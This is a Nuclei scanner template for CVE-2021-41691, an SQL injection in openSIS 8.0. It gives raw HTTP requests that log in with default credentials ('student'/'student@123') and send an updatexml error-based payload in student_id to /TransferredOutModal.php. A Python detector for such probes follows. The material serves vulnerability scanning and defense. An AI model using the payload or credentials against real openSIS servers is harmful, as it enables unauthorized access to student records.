openSIS Student Information System 8.0 SQL Injection
ID: CVE-2021-41691
Severity: high
Author: Bartu Utku SARP
Tags: cve,cve2021,sqli,auth,edb,opensis
Description
openSIS Student Information System version 8.0 is susceptible to SQL injection via the student_id and TRANSFER[SCHOOL] parameters in a POST request sent to /TransferredOutModal.php.
YAML Source
id: CVE-2021-41691

info:
  name: openSIS Student Information System 8.0 SQL Injection
  author: Bartu Utku SARP
  severity: high
  description: openSIS Student Information System version 8.0 is susceptible to SQL injection via the student_id and TRANSFER[SCHOOL] parameters in POST request sent to /TransferredOutModal.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.
  remediation: |
    Apply the latest security patch or upgrade to a patched version of openSIS Student Information System to mitigate the SQL Injection vulnerability (CVE-2021-41691).
  reference:
    - https://securityforeveryone.com/blog/opensis-student-information-system-0-day-vulnerability-cve-2021-41691
    - https://www.exploit-db.com/exploits/50637
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4169
  classification:
    cve-id: CVE-2021-41691
  metadata:
    max-request: 2
  tags: cve,cve2021,sqli,auth,edb,opensis
variables:
  num: "999999999"

http:
  - raw:
      - |
        POST /index.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Content-Type: application/x-www-form-urlencoded

        USERNAME={{username}}&PASSWORD={{password}}&language=en&log=
      - |
        POST /TransferredOutModal.php?modfunc=detail HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Content-Type: application/x-www-form-urlencoded

        student_id=updatexml(0x23,concat(1,md5({{num}})),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5

    attack: pitchfork
    payloads:
      username:
        - student
      password:
        - student@123
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "<!-- SQL STATEMENT:") && contains(body_2, "SELECT COUNT(STUDENT_ID)")'
          - 'status_code_2 == 200'
        condition: and
# digest: 4a0a00473045022100a9cd9674cd3097329efddf0844679b0398ccad6ea9ef11e29c96b29b4fc06690022057fded33d05f5b642f2558396246323ef8e2cd57615364deffdd351902645d69:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-41691.yaml"
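A defender-side check built from the template's second request and its matcher, added here as an example (it is not part of the template or of openSIS): it flags POSTs to /TransferredOutModal.php whose student_id or TRANSFER[SCHOOL] value is not a plain integer, and escalates when the response carries the SQL STATEMENT marker. The function names, verdict strings and sample traffic are constructed, and the check assumes both parameters hold numeric IDs in legitimate use.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Endpoint, parameter names and response marker are taken from the template above.
TARGET_PATH = "/transferredoutmodal.php"
ID_PARAMS = {"student_id", "TRANSFER[SCHOOL]"}
LEAK_MARKER = "<!-- SQL STATEMENT:"
INTEGER = re.compile(r"[0-9]+")


def suspicious_params(method, url, body):
    """Names of ID parameters whose value is not a plain integer.

    Assumption: both parameters carry numeric IDs in legitimate traffic.
    """
    path = urlsplit(url).path.lower()
    if method.upper() != "POST" or not path.endswith(TARGET_PATH):
        return []
    # parse_qsl percent-decodes names and values, so TRANSFER%5BSCHOOL%5D is
    # matched as well; blank values are dropped and therefore never flagged.
    return [name for name, value in parse_qsl(body)
            if name in ID_PARAMS and not INTEGER.fullmatch(value)]


def classify(method, url, body, response_body):
    """Return (verdict, offending parameter names) for one request/response pair."""
    params = suspicious_params(method, url, body)
    if not params:
        return "ok", params
    # The echoed SQL statement is what the template's matcher looks for in the response.
    if LEAK_MARKER in response_body:
        return "sql-error-leaked", params
    return "non-numeric-id", params


# Constructed sample traffic: the template's probe (num substituted) and a normal save.
URL = "/TransferredOutModal.php?modfunc=detail"
PROBE = ("student_id=updatexml(0x23,concat(1,md5(999999999)),1)"
         "&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5")
NORMAL = "student_id=1042&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5"
LEAKY_PAGE = "<html><!-- SQL STATEMENT: SELECT COUNT(STUDENT_ID) ... --></html>"

if __name__ == "__main__":
    print(classify("POST", URL, PROBE, LEAKY_PAGE))
    print(classify("POST", URL, NORMAL, "<html>saved</html>"))
```

A "sql-error-leaked" verdict means the server echoed the failing statement back, so the host should be treated as unpatched; "non-numeric-id" alone indicates probing that did not produce the marker.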